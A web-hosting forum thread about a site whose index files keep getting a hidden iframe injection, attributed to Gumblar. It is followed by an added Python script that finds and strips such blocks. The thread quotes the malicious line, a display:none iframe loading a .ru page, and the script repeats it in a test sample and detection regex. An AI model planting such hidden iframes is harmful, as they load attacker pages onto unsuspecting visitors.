  1. #1
    Join Date: Aug 2006 | Location: USA/UK | Posts: 112

    Iframe Virus .ru .cn

    Hey

    We are having some issues with one of our web sites. The web site is quite big, over 24 gigs; to log in you need to go through a login script. The site is a lead management site.

    Over the last 3 days we have noticed that the login loads with an iframe; after looking at the code I noticed there are tons of these iframe viruses in the code, like:

    Code:
    <div style="display:none"><iframe src="http://xxxxx.ru:8080/index.php" width=666 height=295 ></iframe></div>
    They are in each of the index files of each sub directory of the site. I have downloaded the entire site, Agent Ransacked it and removed each line of code, yet I re-upload and after 30 minutes it's back.

    How can I stop these viruses coming back each time I clean the pages? I have tried to chmod to 444 as someone suggested, but I am unable to change the files to anything other than 644.

    Please help, this is driving me crazy.

    Thanks
    Martyn
    “In the midst of chaos, there is also opportunity”
    ― Sun-Tzu, A Arte da Guerra

  2. #2
    Join Date: May 2008 | Location: Citrus Heights, CA | Posts: 1,887
    http://forums.tizag.com/showthread.php?t=15474

    I believe this was discussed here a few times as well.
    iWebFusion.Net - Shared / Reseller / VPS / Bare Metal / Colocation / IP Transit / Networking
    *Simply Hosting - Wholly owned networks, in-house staff, legions of fans!

  3. #3
    Join Date: Mar 2003 | Location: California USA | Posts: 13,681
    This can be happening for a variety of reasons.

    1.) FTP access

    The account's FTP password could have been obtained or brute-forced. This would allow the attacker to log in and modify the account directly.

    2.) Rogue PHP Script Exploit

    One of the scripts on that account, or even on another account, could have an exploit which would allow the attacker to inject malicious code to do various things on the server.

    3.) PHP Shell

    There could be a PHP shell on the server somewhere from a previous attack. A PHP shell such as c99 can potentially give the attacker full access to the server via kernel exploits.


    It sounds like you need to have the entire server looked at and secured.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  4. #4
    Join Date: Sep 2007 | Posts: 369


    Quote Originally Posted by todo1419 View Post
    Hey

    We are having some issues with one of our web sites. The web site is quite big, over 24 gigs; to log in you need to go through a login script. The site is a lead management site.

    Over the last 3 days we have noticed that the login loads with an iframe; after looking at the code I noticed there are tons of these iframe viruses in the code, like:

    Code:
    <div style="display:none"><iframe src="http://xxxxx.ru:8080/index.php" width=666 height=295 ></iframe></div>
    They are in each of the index files of each sub directory of the site. I have downloaded the entire site, Agent Ransacked it and removed each line of code, yet I re-upload and after 30 minutes it's back.

    How can I stop these viruses coming back each time I clean the pages? I have tried to chmod to 444 as someone suggested, but I am unable to change the files to anything other than 644.

    Please help, this is driving me crazy.

    Thanks
    Martyn
    Better secure your server: install mod_security and change all passwords as well. Also take a backup, with the date, on the server when you clean a site, and set up a good antivirus to do hourly scans so you come to know which files have problems. Regularly check your server's logwatch, check /var/log/messages, /var/log/secure and the Apache logs, and set up a proper firewall implementation: turn on iptables for outgoing ports, and for incoming ports open only those you require; it varies from environment to environment. I know it's hard initially to implement all this, but once you have implemented it all you are much, much more relaxed, and can take a glass of apple juice then.
    Thanks,
    Noman
    noman@linuxonsupport.com
    O Canada, we stand on guard for thee

  5. #5
    Join Date: Aug 2006 | Location: USA/UK | Posts: 112
    Thanks for the replies guys, really appreciate it.

    I'm not really experienced with Linux, so a server set up with the correct firewalls and security has been overlooked, or they are outdated, and I honestly don't trust myself to do it.

    Would anyone here be able to point me in the direction of a good server admin that can do a one time set up, and help me eradicate this..

    Spent 8 hours today cleaning 4000 files of this code, and we didn't even build this script!

    Thanks again
    Martyn
    “In the midst of chaos, there is also opportunity”
    ― Sun-Tzu, A Arte da Guerra

  6. #6
    Join Date: Apr 2007 | Location: United Kingdom | Posts: 1,861
    Quote Originally Posted by todo1419 View Post

    Would anyone here be able to point me in the direction of a good server admin that can do a one time set up, and help me eradicate this..
    Steven from www.rack911.com should be able to do that for you.

  7. #7
    Quote Originally Posted by todo1419 View Post
    Thanks for the replies guys, really appreciate it.

    I'm not really experienced with Linux, so a server set up with the correct firewalls and security has been overlooked, or they are outdated, and I honestly don't trust myself to do it.

    Would anyone here be able to point me in the direction of a good server admin that can do a one time set up, and help me eradicate this..

    Spent 8 hours today cleaning 4000 files of this code, and we didn't even build this script!

    Thanks again
    Martyn
    Virus attacks mostly hit these files:
    index.php
    main.php
    footer.php
    index.html

    so make sure you clean these files properly, or else the virus issue will be there again, and change the FTP password. SET IT to a very strong password
    (do include digits, signs, etc.).

    And you can also hire someone to do that; make a thread in the request section!

  8. #8
    Join Date: Aug 2006 | Location: USA/UK | Posts: 112
    Hey

    Yes, that is what we did. After looking over 4000 files, the code was in many files, not just the index or main files but in sub directories of sub directories. Of the 4000 there were 120 or so infected.

    I cleaned each, changed the passwords of the FTP and SQL, re-uploaded, and then after around 30 minutes it was back in each file I had just cleaned! So I ended up almost crying! The good part is that I have the cleaned files on my local PC, so I can upload these at will, but I want to secure the server first and find out where this is coming from, as simply re-uploading the files is not really working for me.
    Last edited by M-Vizovi; 09-19-2009 at 06:21 PM.
    “In the midst of chaos, there is also opportunity”
    ― Sun-Tzu, A Arte da Guerra

  9. #9
    That sucks, really. Very irritating. Hire a professional as soon as possible to do this work!

  10. #10
    Join Date: Apr 2003 | Location: NC | Posts: 3,093
    In the future you may want to script a find and replace; that way you can clean up the files with a single command for ALL files. You would still need to clean them up, but that at least helps clean it up quicker.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  11. #11
    Join Date: Aug 2006 | Location: USA/UK | Posts: 112
    Hey

    We seem to have found the issue: it is the Gumblar virus, which is hidden in a client's PDF file; as soon as this file is read it activates the infection.

    A scripting idea would be awesome, but the URL of the virus changes each time it's activated, e.g. gxmbler.ru, bxxoxe-life.ru etc. I guess we could search for "iframe".

    Thanks
    Martyn
    “In the midst of chaos, there is also opportunity”
    ― Sun-Tzu, A Arte da Guerra
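As an added example (not code from anyone in this thread), a Python script that does the scripted find-and-replace suggested in #10 while coping with the changing hostnames noted in #11: it matches the hidden-div-plus-iframe shape rather than any particular domain, reports the URL found in each file, and keeps a copy of every infected file before rewriting it. The sample HTML, the hostname evil.invalid and the .infected naming are constructed assumptions.

```python
import re
import sys
from pathlib import Path

# Constructed sample (not from the thread): a login page carrying two injected
# blocks pointing at different hosts, plus legitimate markup that must survive.
SAMPLE_INFECTED = (
    '<html><body><h1>Login</h1>\n'
    '<div style="display:none"><iframe src="http://xxxxx.ru:8080/index.php" '
    'width=666 height=295 ></iframe></div>\n'
    '<form action="login.php"><input name="user"></form>\n'
    "<div style='display: none;'><iframe src=http://evil.invalid/x.php></iframe></div>\n"
    '</body></html>'
)

# Matches the shape of the injection rather than any one domain: a display:none
# <div> wrapping a single <iframe>. The src URL is captured for reporting.
INJECTED_IFRAME = re.compile(
    r'<div\s+style=["\']?\s*display\s*:\s*none\s*;?\s*["\']?\s*>'
    r'\s*<iframe\b[^>]*?\bsrc=["\']?(?P<src>[^"\'\s>]+)[^>]*>\s*</iframe>\s*</div>\s*',
    re.IGNORECASE | re.DOTALL,
)
def find_injections(html: str) -> list:
    """Return the src URL of every hidden-iframe block found in the text."""
    return [m.group("src") for m in INJECTED_IFRAME.finditer(html)]
def clean_html(html: str) -> tuple:
    """Remove every injected block; return (cleaned_text, number_removed)."""
    return INJECTED_IFRAME.subn("", html)
def clean_tree(root: Path, apply: bool = False) -> dict:
    """Map each infected file under root to the URLs found in it. With apply=True
    the file is rewritten after its original is saved as <name>.infected."""
    report = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in {".php", ".html", ".htm", ".js"}:
            continue
        text = path.read_text(encoding="utf-8", errors="surrogateescape")
        hits = find_injections(text)
        if hits:
            report[str(path)] = hits
        if hits and apply:
            path.with_suffix(path.suffix + ".infected").write_bytes(path.read_bytes())
            path.write_text(clean_html(text)[0], encoding="utf-8", errors="surrogateescape")
    return report

if __name__ == "__main__":  # usage: clean_iframes.py DOCROOT [--apply]; omit --apply for a dry run
    for file, urls in clean_tree(Path(sys.argv[1]), "--apply" in sys.argv).items():
        print(f"{file}: {', '.join(urls)}")
```

Run it without --apply first and review the reported URLs; a file that keeps reappearing in the report after cleaning points at the reinfection path (stolen FTP credentials or a web shell) rather than at the files themselves.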
